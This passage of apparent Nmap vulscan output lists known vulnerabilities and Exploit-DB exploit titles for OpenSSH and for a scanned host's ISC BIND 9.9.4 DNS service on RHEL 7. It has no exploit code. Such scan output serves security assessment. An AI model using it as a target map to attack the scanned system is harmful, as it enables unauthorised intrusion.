10486| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
10487| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
10488| [30794] Red Hat OpenSSH Backdoor Vulnerability
10489| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
10490| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
10491| [28531] OpenSSH ForceCommand Command Execution Weakness
10492| [28444] OpenSSH X Connections Session Hijacking Vulnerability
10493| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
10494| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
10495| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
10496| [20956] OpenSSH Privilege Separation Key Signature Weakness
10497| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
10498| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
10499| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
10500| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
10501| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
10502| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
10503| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
10504| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
10505| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
10506| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
10507| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
10508| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
10509| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
10510| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
10511| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
10512| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
10513| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
10514| [6168] OpenSSH Visible Password Vulnerability
10515| [5374] OpenSSH Trojan Horse Vulnerability
10516| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
10517| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10518| [4241] OpenSSH Channel Code Off-By-One Vulnerability
10519| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
10520| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
10521| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
10522| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
10523| [2917] OpenSSH PAM Session Evasion Vulnerability
10524| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
10525| [2356] OpenSSH Private Key Authentication Check Vulnerability
10526| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
10527| [1334] OpenSSH UseLogin Vulnerability
10528|
10529| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10530| [83258] GSI-OpenSSH auth-pam.c security bypass
10531| [82781] OpenSSH time limit denial of service
10532| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
10533| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
10534| [72756] Debian openssh-server commands information disclosure
10535| [68339] OpenSSH pam_thread buffer overflow
10536| [67264] OpenSSH ssh-keysign unauthorized access
10537| [65910] OpenSSH remote_glob function denial of service
10538| [65163] OpenSSH certificate information disclosure
10539| [64387] OpenSSH J-PAKE security bypass
10540| [63337] Cisco Unified Videoconferencing OpenSSH weak security
10541| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
10542| [45202] OpenSSH signal handler denial of service
10543| [44747] RHEL OpenSSH backdoor
10544| [44280] OpenSSH PermitRootLogin information disclosure
10545| [44279] OpenSSH sshd weak security
10546| [44037] OpenSSH sshd SELinux role unauthorized access
10547| [43940] OpenSSH X11 forwarding information disclosure
10548| [41549] OpenSSH ForceCommand directive security bypass
10549| [41438] OpenSSH sshd session hijacking
10550| [40897] OpenSSH known_hosts weak security
10551| [40587] OpenSSH username weak security
10552| [37371] OpenSSH username data manipulation
10553| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
10554| [37112] RHSA update for OpenSSH signal handler race condition not installed
10555| [37107] RHSA update for OpenSSH identical block denial of service not installed
10556| [36637] OpenSSH X11 cookie privilege escalation
10557| [35167] OpenSSH packet.c newkeys[mode] denial of service
10558| [34490] OpenSSH OPIE information disclosure
10559| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
10560| [32975] Apple Mac OS X OpenSSH denial of service
10561| [32387] RHSA-2006:0738 updates for openssh not installed
10562| [32359] RHSA-2006:0697 updates for openssh not installed
10563| [32230] RHSA-2006:0298 updates for openssh not installed
10564| [32132] RHSA-2006:0044 updates for openssh not installed
10565| [30120] OpenSSH privilege separation monitor authentication verification weakness
10566| [29255] OpenSSH GSSAPI user enumeration
10567| [29254] OpenSSH signal handler race condition
10568| [29158] OpenSSH identical block denial of service
10569| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
10570| [25116] OpenSSH OpenPAM denial of service
10571| [24305] OpenSSH SCP shell expansion command execution
10572| [22665] RHSA-2005:106 updates for openssh not installed
10573| [22117] OpenSSH GSSAPI allows elevated privileges
10574| [22115] OpenSSH GatewayPorts security bypass
10575| [20930] OpenSSH sshd.c LoginGraceTime denial of service
10576| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
10577| [17213] OpenSSH allows port bouncing attacks
10578| [16323] OpenSSH scp file overwrite
10579| [13797] OpenSSH PAM information leak
10580| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
10581| [13264] OpenSSH PAM code could allow an attacker to gain access
10582| [13215] OpenSSH buffer management errors could allow an attacker to execute code
10583| [13214] OpenSSH memory vulnerabilities
10584| [13191] OpenSSH large packet buffer overflow
10585| [12196] OpenSSH could allow an attacker to bypass login restrictions
10586| [11970] OpenSSH could allow an attacker to obtain valid administrative account
10587| [11902] OpenSSH PAM support enabled information leak
10588| [9803] OpenSSH "
10589| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
10590| [9307] OpenSSH is running on the system
10591| [9169] OpenSSH "
10592| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
10593| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
10594| [8383] OpenSSH off-by-one error in channel code
10595| [7647] OpenSSH UseLogin option arbitrary code execution
10596| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
10597| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
10598| [7179] OpenSSH source IP access control bypass
10599| [6757] OpenSSH "
10600| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
10601| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
10602| [5517] OpenSSH allows unauthorized access to resources
10603| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
10604|
10605| Exploit-DB - https://www.exploit-db.com:
10606| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
10607| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
10608| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10609| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
10610| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
10611| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
10612| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
10613| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
10614| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
10615| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
10616| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
10617| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
10618| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
10619| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
10620|
10621| OpenVAS (Nessus) - http://www.openvas.org:
10622| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
10623| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
10624| [881183] CentOS Update for openssh CESA-2012:0884 centos6
10625| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
10626| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
10627| [870763] RedHat Update for openssh RHSA-2012:0884-04
10628| [870129] RedHat Update for openssh RHSA-2008:0855-01
10629| [861813] Fedora Update for openssh FEDORA-2010-5429
10630| [861319] Fedora Update for openssh FEDORA-2007-395
10631| [861170] Fedora Update for openssh FEDORA-2007-394
10632| [861012] Fedora Update for openssh FEDORA-2007-715
10633| [840345] Ubuntu Update for openssh vulnerability USN-597-1
10634| [840300] Ubuntu Update for openssh update USN-612-5
10635| [840271] Ubuntu Update for openssh vulnerability USN-612-2
10636| [840268] Ubuntu Update for openssh update USN-612-7
10637| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
10638| [840214] Ubuntu Update for openssh vulnerability USN-566-1
10639| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
10640| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
10641| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
10642| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
10643| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
10644| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
10645| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
10646| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
10647| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
10648| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10649| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10650| [100584] OpenSSH X Connections Session Hijacking Vulnerability
10651| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
10652| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
10653| [65987] SLES10: Security update for OpenSSH
10654| [65819] SLES10: Security update for OpenSSH
10655| [65514] SLES9: Security update for OpenSSH
10656| [65513] SLES9: Security update for OpenSSH
10657| [65334] SLES9: Security update for OpenSSH
10658| [65248] SLES9: Security update for OpenSSH
10659| [65218] SLES9: Security update for OpenSSH
10660| [65169] SLES9: Security update for openssh,openssh-askpass
10661| [65126] SLES9: Security update for OpenSSH
10662| [65019] SLES9: Security update for OpenSSH
10663| [65015] SLES9: Security update for OpenSSH
10664| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
10665| [61639] Debian Security Advisory DSA 1638-1 (openssh)
10666| [61030] Debian Security Advisory DSA 1576-2 (openssh)
10667| [61029] Debian Security Advisory DSA 1576-1 (openssh)
10668| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
10669| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
10670| [60667] Slackware Advisory SSA:2008-095-01 openssh
10671| [59014] Slackware Advisory SSA:2007-255-01 openssh
10672| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
10673| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
10674| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
10675| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
10676| [57492] Slackware Advisory SSA:2006-272-02 openssh
10677| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
10678| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
10679| [57470] FreeBSD Ports: openssh
10680| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
10681| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
10682| [56294] Slackware Advisory SSA:2006-045-06 openssh
10683| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
10684| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
10685| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
10686| [53788] Debian Security Advisory DSA 025-1 (openssh)
10687| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
10688| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
10689| [11343] OpenSSH Client Unauthorized Remote Forwarding
10690| [10954] OpenSSH AFS/Kerberos ticket/token passing
10691| [10883] OpenSSH Channel Code Off by 1
10692| [10823] OpenSSH UseLogin Environment Variables
10693|
10694| SecurityTracker - https://www.securitytracker.com:
10695| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
10696| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
10697| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
10698| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
10699| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
10700| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
10701| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
10702| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
10703| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
10704| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
10705| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
10706| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
10707| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
10708| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
10709| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
10710| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
10711| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
10712| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
10713| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
10714| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
10715| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
10716| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
10717| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
10718| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
10719| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
10720| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
10721| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
10722| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
10723| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
10724| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
10725| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
10726| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
10727| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
10728| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
10729| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
10730| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
10731| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
10732| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
10733|
10734| OSVDB - http://www.osvdb.org:
10735| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
10736| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
10737| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
10738| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
10739| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
10740| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
10741| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
10742| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
10743| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
10744| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
10745| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
10746| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
10747| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
10748| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
10749| [56921] OpenSSH Unspecified Remote Compromise
10750| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
10751| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
10752| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
10753| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
10754| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
10755| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
10756| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
10757| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
10758| [43745] OpenSSH X11 Forwarding Local Session Hijacking
10759| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
10760| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
10761| [37315] pam_usb OpenSSH Authentication Unspecified Issue
10762| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
10763| [34601] OPIE w/ OpenSSH Account Enumeration
10764| [34600] OpenSSH S/KEY Authentication Account Enumeration
10765| [32721] OpenSSH Username Password Complexity Account Enumeration
10766| [30232] OpenSSH Privilege Separation Monitor Weakness
10767| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
10768| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
10769| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
10770| [29152] OpenSSH Identical Block Packet DoS
10771| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
10772| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
10773| [22692] OpenSSH scp Command Line Filename Processing Command Injection
10774| [20216] OpenSSH with KerberosV Remote Authentication Bypass
10775| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
10776| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
10777| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
10778| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
10779| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
10780| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
10781| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
10782| [6601] OpenSSH *realloc() Unspecified Memory Errors
10783| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
10784| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
10785| [6072] OpenSSH PAM Conversation Function Stack Modification
10786| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
10787| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
10788| [5408] OpenSSH echo simulation Information Disclosure
10789| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
10790| [4536] OpenSSH Portable AIX linker Privilege Escalation
10791| [3938] OpenSSL and OpenSSH /dev/random Check Failure
10792| [3456] OpenSSH buffer_append_space() Heap Corruption
10793| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
10794| [2140] OpenSSH w/ PAM Username Validity Timing Attack
10795| [2112] OpenSSH Reverse DNS Lookup Bypass
10796| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
10797| [1853] OpenSSH Symbolic Link 'cookies' File Removal
10798| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
10799| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
10800| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
10801| [688] OpenSSH UseLogin Environment Variable Local Command Execution
10802| [642] OpenSSH Multiple Key Type ACL Bypass
10803| [504] OpenSSH SSHv2 Public Key Authentication Bypass
10804| [341] OpenSSH UseLogin Local Privilege Escalation
10805|_
53/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
10807| vulscan: VulDB - https://vuldb.com:
10808| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
10809| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
10810| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
10811| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
10812| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
10813| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
10814| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
10815| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
10816| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
10817| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
10818| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
10819| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
10820| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
10821| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
10822| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
10823| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
10824| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
10825| [5875] ISC BIND 9.9.0/9.9.1 denial of service
10826| [5874] ISC BIND up to 9.9.1-P1 denial of service
10827| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
10828|
10829| MITRE CVE - https://cve.mitre.org:
10830| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
10831| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
10832| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
10833| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
10834| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
10835| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
10836| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
10837| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
10838| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
10839| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
10840| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
10841| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
10842|
10843| SecurityFocus - https://www.securityfocus.com/bid/:
10844| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
10845| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
10846| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
10847| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
10848| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
10849| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
10850| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
10851| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
10852| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
10853| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
10854| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
10855| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
10856| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
10857| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
10858| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
10859| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
10860| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
10861| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
10862| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
10863| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
10864| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
10865| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
10866| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
10867| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
10868| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
10869| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
